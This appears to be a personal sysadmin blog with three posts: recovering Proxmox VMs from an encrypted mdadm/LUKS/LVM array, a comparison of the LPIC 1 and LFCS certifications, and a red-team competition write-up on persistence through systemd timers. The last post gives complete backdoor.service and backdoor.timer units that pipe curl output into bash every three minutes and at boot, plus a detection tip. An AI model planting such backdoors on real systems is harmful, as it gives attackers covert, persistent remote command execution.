Recovering Proxmox VMs from Encrypted Raid Array

Initial Thoughts: Blog Reboot

It has been a few years since this Blog has been active, or frankly seen the light of day, beyond some web caches I enabled awhile back. The biggest reason for the blog phasing out, was the first server I ever built (back in 2010) having a failing mother board shortly after the birth of our first child. Now, shortly after the birth of our second child and with the abundance of free time this crisis has awarded us all, I’ve decided to give the blog and my good old Proxmox server a reboot.

Recovering Raid Array

Now since I didn’t have the original working hardware and I didn’t retain good VM backups, I had to recover the VMs from just the encrypted drives. That meant the first step to beginning this journey of recovering Proxmox VMs, was dealing with an encrypted raid 1 storage array.

To begin this recovery process I simply put the two ”high-end” 120 GB SSD drives, in the new server I built to run the latest version of Proxmox. Next we need to boot up the server and use mdadm to examine the drives to identify the raid format.

lsblk # to list all the current block devices

mdadm -E /dev/sd[c-d] #use mdadm to examine 

Then we can use mdadm to re-assemble the raid. In this case, since the the drives are mirrors it likely doesn’t matter, but for some individuals this will likely be a required step in order to complete a full recovery.

mdadm --assemble /dev/md1 /dev/sd[c-d]1 # use mdadm to re-assemble
# the raid as md1

Decrypting LVM Structure

Next we need to decrypt the raid drive so we can access the logical volumes and mount them to begin recovering Proxmox VMs from the encrypted file system.

cryptsetup luksOpen /dev/md1 encrypted_pve # Open the luks encrytped device

Now that the the encrypted device has been opened and mounted as the device encrypted_pve. We can now access the volume group within the encrypted partition with standard LVM commands.

vgdisplay --short # for instance just viewing the volume group

Now if your somewhat lazy like me and doing all of this work on the a new installation of Proxmox. Your likely going to start having a bad time and encounter issues because by default, Proxmox wants its primary volume group to be named ‘pve’ and now there are two different ones with the same name. In order to avoid confusion going forward and stop our new Proxmox server from crashing, we should rename the old ‘pve’ volume group to something else.

vgdisplay | egrep -i "uuid|name|VG size" # use vgdisplay to 
# find the UUID of the VG

vgrename QiOPy3-WhF8-RYns-44dY-FKKN-8orV-bEi3m3 pve-old # use vgrename
# to simply rename the VG using the appropriate UUID

vgscan  # lastly we can use vgscan to reload all the vgs as a 
# sanity check

Recovering Proxmox VMs Config files

Now that we have access to the original LVM structure we can go about recovering VMs from the file system. To start this process we should mount the two logical volumes Proxmox has by default. These two would be the root and data logical on our old ‘pve’ volume group.

mkdir /mnt/old-data /mnt/old-root #create directories to mount
# logical volumes

mount /dev/mapper/pve--old-root /mnt/old-root # mount old pve root

mount/dev/mapper/pve--old-data /mnt/old-data # mount old pve data

Here is the point where things diverge a bit depending on what version of your recovering from and how your VMs where originally setup. Regardless there are really only two components to a given VM in the Proxmox world, a config file and a disk image.

To recover the VM config files in newer versions of Proxmox you would just go into the /mnt/old-root/etc/pve/qemu-server/ directory. There you would likely see a bunch of VM configuration file named after the VM ID number. Generally speaking you should be able to copy these configs over to your new Proxmox server without too much of an issue.

cd /mnt/old-root/etc/pve/qemu-server/ # go to the mounted config 
# directory

cp 100.conf /etc/pve/qemu-server/

However, if your like me and you are looking around for these VMID.conf files and they aren’t on the old root filesystem. That’s because in older versions Proxmox the VM configs were stored in a sqlite database. Instead we can use the sqlite3 command on the pve-cluster config database in order to view all the VM config files and extract the ones we want directly to workable config files.

sqlite3 /mnt/old-root/var/lib/pve-cluster/config.db \
'SELECT * FROM tree;' # use sqlite3 to view all of the 
# config data in the cluster config database

sqlite3 /mnt/old-root/var/lib/pve-cluster/config.db \
'SELECT data FROM tree WHERE name = "100.conf";' \
> /etc/pve/qemu-server/100.conf 
# use a sql query to extract just the config file data 
# we need and write it to the appropriate file/code>

Recovering Proxmox VMs Raw Disks and Disk Images

When it comes to VM disk images they can be either raw, meaning they are logical volumes provisioned within a volume group using LVM or disk image files like qcow2's. Regardless of which type of VM disk image or if like me and had both. The path forward is basically the same, just copy it over to appropriate place on the never server.

In the case of raw disks, all we really need to do is copy the logical volume that was provisioned in the old volume group over to the new volume group. To do this we need to create a new logical volume on the the new volume group with the same size and name. Then use dd to copy over the raw data from the old logical volume to the new one.

lsblk # look at all our physical and logical devices to
# make sure we use the right devices

lvcreate -n vm-100-disk-1 -L 10G pve # Create the new logical 
# volume with the same name and size

# dd if=/dev/pve-old/vm-100-disk-1 bs=4096 of=/dev/pve/vm-100-disk-1 
# Use dd to complete a bit by bit copy of the LV data, ! Caution !

If you need to deal with the VM disk files, its pretty straight forward as well. Just go into the old-data directory we mounted and copy the disk image files over to the new storage location. These can be a various formats like qcow2 or vmdk, but the process is the same.

mkdir /var/lib/vz/images/100 # create the folder for your VM

cp /mnt/old-data/images/100/vm-100-disk-1.qcow2  \
/var/lib/vz/images/100/vm-100-disk-1.qcow2 
# copy over the disk image to appropriate local folder

Getting VMs to Boot

At this point Proxmox should have seen the VM configuration files added to the local nodes configuration directory and it should be visible in web UI and/or qm at the command line. The very last step in recovering Proxmox VMs is making sure your VM configuration is correct so it can boot up. I could probably do research and a whole blog post on this topic alone. So its kind of difficult to provide detailed examples of what could be wrong with a given configuration file. Since the configuration files are from working VMs, most likely issues are either device statements or the boot order.

The boot order can be forced with the bootdisk option, to a given device, such as ide0. Devices are registered in the config file as device statements like 'ide0: local:vm-100-disk-1'. Make sure your device statements are correct and your cdrom is empty such as 'ide2: none,media=cdrom' to avoid boot issues. For other errors make be sure review the documentation or ask in the comments bellow.

Linux Administration Certifications: LPIC 1 and LFCS

LPIC 1 and LFCS

TLDR; The LPIC 1 and LFCS certifications can both be used to validate your skills, however the LFCS provides a robust and uniquely hands-one, testing approach.

I recently passed the LPIC 1 (Linux Professional Institute Certified System Administrator) and LFCS (Linux Foundation Certified System Administrator) certification exams. I’m now planning to pursue the LPIC 2 and LFCE certifications this coming year. Several individuals have approached me interested in hearing more about my experiences and some of big differences between the LPIC 1 and LFCS. I’ll attempt to address those questions here and also share my opinions on the perceived value in the market place today.

Big Differences

The biggest differences between the LPIC 1 and LFCS certifications, definitely come down to the testing methods they each use. The LPIC 1 is a standard multiple choice style examination, with a few fill the blank questions. The LPIC features two exams with 50 knowledge base and practical application question, over one and half hours. The LFCS on the other hand, is a interactive practical applications exam. Wherein the tester is given 40 practical multi-step tasks, within an actual Linux terminal, with two hours to complete as many as possible.

Another major difference between the LPIC 1 and LFCS is how the testing is conducted. The two LPIC 1 exams are proctored by Pearson Vue, so they take place in your standard testing center. Since it’s a standard multiple choice exam, in a standard testing center, you will receive your test results right after completing the exam. You are scored based on whether or not you select the correct answers to the exam questions and the respective weight in each of the tested categories. The LFCS is a online exam which utilizes a web cam, a screen share, a task portal, and a live connection to a Linux system to conduct the exam. Throughout the exam you have terminal access to your own Linux virtual machine, to complete your various tasks.  The entire system is graded upon completion and delays receiving your final score. Thus your score is based on whether each step of the tasks and the tasks themselves are completed correctly. Its also rumored, that points lost on one task can be recovered on others based on the methods used, cleanliness, and overall efficiency.

Difficulty Level

The difficulty level of the LPIC 1 and LFCS is heavily debated, however I think it comes down to how you study and your experience within the Linux terminal. That being said, the LPIC 1 is largely a test of base knowledge, so if one puts forth the time and effort to review some of the coursework out there, they shouldn’t have any problem completing the exam. I honestly don’t believe your experience in the Linux terminal is going to help you out anyone more then one of the official books. The exam is all about knowing the command names and what they do. On the other hand, the LFCS exam, and its largely based on weather or not you can complete a business operations related task, in a timely manner. There is no official book for the LFCS exam, although there is online coursework which introduces you to commands and then provides lab activities for completion all on your own. Having completed all of the online course work, I believe its likely sufficient to pass the exam. However I think the real world Linux experience would be quite a bit more useful during the LFSC exam, simple because your being indirectly scored on timeliness and efficiency. Addtionally, on top of having to understand what the names of commands are and what they do, one also needs to understand how to effectively use each command to successfully pass the LFSC exam. Overall I would say the LFCS is going to be far more difficult for those newer to Linux, if only because of more intimidating structure of the exam and the review of ones efficiency.

Market Value

When it comes to the market value of the LPIC 1 and LFCS certifications, I think the total value depends on your individual goals. For instances, if your goal is to get your foot in the door at a large institution, I would recommend the LPIC 1 since it has been around longer and thus has a greater chance of being recognized by a recruiter or HR. The LPIC 1 is also going to be better if your goal is to continue on and become more specialized within the Linux space. If your goal is instead to provide validation of your skills and experience to a future or current employer I would highly recommend the LFCS. In addition to the certification being run by the Linux Foundation themselves, they now have a partnership with Microsoft. This new partnership creates a great opportunity for those working within more diverse environments, by allowing for canadits to take both Linux foundation and Microsoft certifications to become specialized in mix environments and/or cloud. Overall I think if your really trying to project your worth to the market, the LPIC 1 is a better bet, simply because its been around longer and currently has more recognize then LFCS. However, I’d bet the LFCS will soon take its place at the top, due to the growing relationships being fostered by the Linux Foundation.

Honorable Mentions

Although I have not attempted these exams, because they are distribution specific, the OCA (Oracle Certified Administrator) and the RHCSA (Red Hat Certified System Administrator) both seem to have more visibility in the market place. This is likely due to the huge brand recognition associated with these respective certifications. If your already employed with an organization that mostly utilizes either of these distributions, they may provide more bang for your buck.

Establishing Persistence with systemd.timers

With the push to covert all of our old init style processes managers to the new cutting-edge systemd, comes a whole new set of security concerns. In several recent competitions, I was able to establish persistence with systemd.timer units. Timer units are designed to run repetitive tasks on behalf of an existing service. This is normally used to establish service watchers, in case a service were to hang of crash. However, we can take advantage of this build-in core functionality to establish near-kernel level persistence with systemd.timers. As an added bonus, it’s a bit more difficult to find then a crontab and there are several tools that can convert existing crontabs to systemd.timers.

In order to take advantage of persistence with systemd.timers, we just need write access to the /etc/systemd/system/ or /usr/lib/systemd/system/ directory. With a user with write access, normally only root, we can create a service unit file and a timer unit file. Once the files are created, we can register the timer unit with systemd and it will execute our service unit, per our timer unit schedule. Timer units can even be registered with systemd to be started at boot automatically, to maintain persistence through reboots.

Example persistence with systemd.timers

To establish persistence with systemd.timers, we first need to create a service unit. In this case I created a file called /etc/systemd/system/backdoor.service, which would connect to a web server and execute a the given command.

[Unit]
Description=Backdoor

[Service]
Type=simple
ExecStart=curl --insecure https://127.0.0.1/cmd.txt|bash

Next I created a timer unit that launches my backdoor.service every 3 mins, to execute my latest CnC commands. The following is the contents of the file, /etc/systemd/system/backdoor.timer, which I used throughout the CCDC competitions.

[Unit]
Description=Runs backdoor ever 3 mins

[Timer]
OnBootSec=5min
OnUnitActiveSec=3min
Unit=backdoor.service

[Install]
WantedBy=multi-user.target

Once those two files are created within one of the systemd unit directories, we can simple establish the persistence with systemd.timer, by starting the unit timer.

systemctl start backdoor.timer

Then to ensure the timer is automatically started a boot, tell systemd to enable the timer unit at startup.

systemctl enable backdoor.timer

As far as I can tell from my research, there isn’t any easy way to detect these types of backdoors. However, in the CCDC competition space, I highly recommend running a command like the following in a screen to identify changes to timer units.

watch -d systemctl list-timers

Example persistence with Single Service Unit

The alterative is to have a single service unit that takes advantage of an exit code of 0; to continuously restart. Bellow is an example of such a service unit file, that will just restart every 3 mins and also execute our CnC command.

[Service]
Type=simple
ExecStart=curl --insecure https://127.0.0.1/cmd.txt|bash; exit 0
Restart=always
RestartSec=180

For more detailed information see the full documentation at: https://www.freedesktop.org/software/systemd/man/ or through your local man pages.